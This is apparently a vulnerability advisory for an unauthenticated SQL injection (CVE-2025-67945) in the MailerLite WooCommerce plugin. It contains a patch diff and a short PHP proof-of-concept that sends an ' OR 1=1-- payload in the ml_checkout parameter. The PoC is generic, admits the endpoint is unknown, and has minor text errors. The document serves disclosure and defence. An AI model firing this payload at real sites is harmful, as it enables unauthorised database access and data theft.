Atomic Edge analysis of CVE-2025-67945:
This vulnerability is an unauthenticated SQL injection in the MailerLite WooCommerce integration plugin for WordPress, affecting versions up to and including 3.1.2. The flaw resides in the `reloadCheckout` function, allowing attackers to inject malicious SQL payloads via the `ml_checkout` parameter. The CVSS score of 7.5 reflects a high-severity issue enabling data extraction.
The root cause is insufficient input sanitization and a lack of prepared statements in the `reloadCheckout` method within the `WooMailerLitePluginController.php` file. The vulnerable code at line 78 directly interpolates the user-controlled `$this->request[‘ml_checkout’]` value into a SQL LIKE clause. The query `WooMailerLiteCart::where(‘data’, ‘like’, ‘%’.$this->request[‘ml_checkout’].’%’)->first()` does not escape the input for use in a SQL context, enabling injection.
Exploitation occurs via a request to the WordPress frontend or an endpoint that triggers the `reloadCheckout` method. An unauthenticated attacker sends a crafted `ml_checkout` parameter containing SQL injection payloads. For example, a payload like `’ OR 1=1–` could be appended to manipulate the query logic. The attack vector is straightforward, requiring no authentication or special privileges.
The patch modifies the `reloadCheckout` method in `WooMailerLitePluginController.php`. The fix applies multiple layers of defense. First, it wraps the `ml_checkout` value in `intval()` to cast it to an integer. Second, it uses `db()->esc_like($raw)` to properly escape the value for a SQL LIKE clause. Third, it applies `addcslashes` to the escaped value to further neutralize wildcard characters. These changes ensure the user input is sanitized before being included in the database query.
Successful exploitation allows attackers to extract sensitive information from the WordPress database. This includes user credentials, personal identifiable information, order details, and plugin-specific data. Attackers can perform data exfiltration, potentially leading to further system compromise or privacy violations.
--- a/woo-mailerlite/includes/WooMailerLiteService.php
+++ b/woo-mailerlite/includes/WooMailerLiteService.php
@@ -124,12 +124,6 @@
'create_subscriber' => $checkoutData['subscribe'] ?? false,
];
- if (isset($checkoutData['language'])) {
- $orderCustomer['subscriber_fields'] = [
- 'subscriber_language' => $checkoutData['language'],
- ];
- }
-
if (isset($checkoutData['subscriber_fields'])) {
$orderCustomer['subscriber_fields'] = array_merge($orderCustomer['subscriber_fields'] ?? [],
@@ -151,6 +145,10 @@
ARRAY_FILTER_USE_BOTH
);
+ if (isset($checkoutData['language'])) {
+ $orderCustomer['subscriber_fields']['subscriber_language'] = $checkoutData['language'];
+ $orderCustomer['subscriber_fields']['language'] = $checkoutData['language'];
+ }
$orderCart = [
'resource_id' => (string)$checkoutData['id'],
--- a/woo-mailerlite/includes/controllers/WooMailerLiteOrderController.php
+++ b/woo-mailerlite/includes/controllers/WooMailerLiteOrderController.php
@@ -75,7 +75,7 @@
if ($cart && isset($cart->subscribe)) {
$subscribe = $cart->subscribe;
}
- if (WooMailerLiteOptions::get("settings.checkoutHidden")) {
+ if (WooMailerLiteOptions::get("settings.checkoutHidden") || $order->get_meta('_woo_ml_subscribe')) {
$subscribe = true;
}
--- a/woo-mailerlite/includes/controllers/WooMailerLitePluginController.php
+++ b/woo-mailerlite/includes/controllers/WooMailerLitePluginController.php
@@ -73,14 +73,24 @@
public function reloadCheckout()
{
- if (!function_exists('WC') || !is_object(WC()->session)) {
- return false;
- }
- if ($this->requestHas('ml_checkout')) {
- $cart = WooMailerLiteCart::where('data', 'like', '%'.$this->request['ml_checkout'].'%')->first();
- if ($cart && $cart->exists()) {
- WC()->session->set('cart', $cart->data);
+ try {
+ if (!function_exists('WC') || !is_object(WC()->session)) {
+ return false;
+ }
+ if ($this->requestHas('ml_checkout')) {
+ $raw = intval($this->request['ml_checkout']);
+ $escaped = db()->esc_like($raw);
+ $escaped = '%checkout_id":' . addcslashes($escaped, '%_') . '%';
+ $cart = WooMailerLiteCart::where('data', 'like', $escaped)->first();
+ if ($cart && $cart->exists()) {
+ $cartData = $cart->data;
+ unset($cartData['checkout_id']);
+ WC()->session->set('cart', $cartData);
+ }
}
+ } catch (Throwable $e) {
+ WooMailerLiteLog()->error('Error restoring cart from checkout ID: ' . $e->getMessage());
}
+ return true;
}
}
--- a/woo-mailerlite/woo-mailerlite.php
+++ b/woo-mailerlite/woo-mailerlite.php
@@ -15,7 +15,7 @@
* Plugin Name: MailerLite - WooCommerce integration
* Plugin URI: https://wordpress.org/plugins/woo-mailerlite/
* Description: Official MailerLite integration for WooCommerce. Track sales and campaign ROI, import products details, automate emails based on purchases and seamlessly add your customers to your email marketing lists via WooCommerce's checkout process.
- * Version: 3.1.2
+ * Version: 3.1.3
* Author: MailerLite
* Author URI: https://mailerlite.com
* License: GPL-2.0+
@@ -39,7 +39,7 @@
* Start at version 1.0.0 and use SemVer - https://semver.org
* Update when you release new versions.
*/
-define( 'WOO_MAILERLITE_VERSION', '3.1.2' );
+define( 'WOO_MAILERLITE_VERSION', '3.1.3' );
define('WOO_MAILERLITE_ASYNC_JOBS', false);
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67945 - MailerLite – WooCommerce integration <= 3.1.2 - Unauthenticated SQL Injection
<?php
$target_url = 'https://vulnerable-site.com/';
// The vulnerable endpoint is not explicitly shown in the diff.
// The reloadCheckout method is likely called via a WordPress hook or frontend action.
// This PoC demonstrates a generic SQL injection attempt via the ml_checkout parameter.
// Adjust the endpoint path if the specific handler is known (e.g., a REST API route or admin-ajax.php).
$payload = "' OR 1=1--";
$ch = curl_init();
// Attempt a POST request, as the parameter may be expected via POST.
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['ml_checkout' => $payload]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// Add headers to simulate a normal web request.
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'User-Agent: Atomic Edge PoC',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language: en-US,en;q=0.5',
'Content-Type: application/x-www-form-urlencoded',
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Response Code: $http_coden";
echo "Response Length: " . strlen($response) . "n";
// In a real attack, the response might contain database error messages or manipulated data.
// This script serves as a basic test for parameter injection.
?>
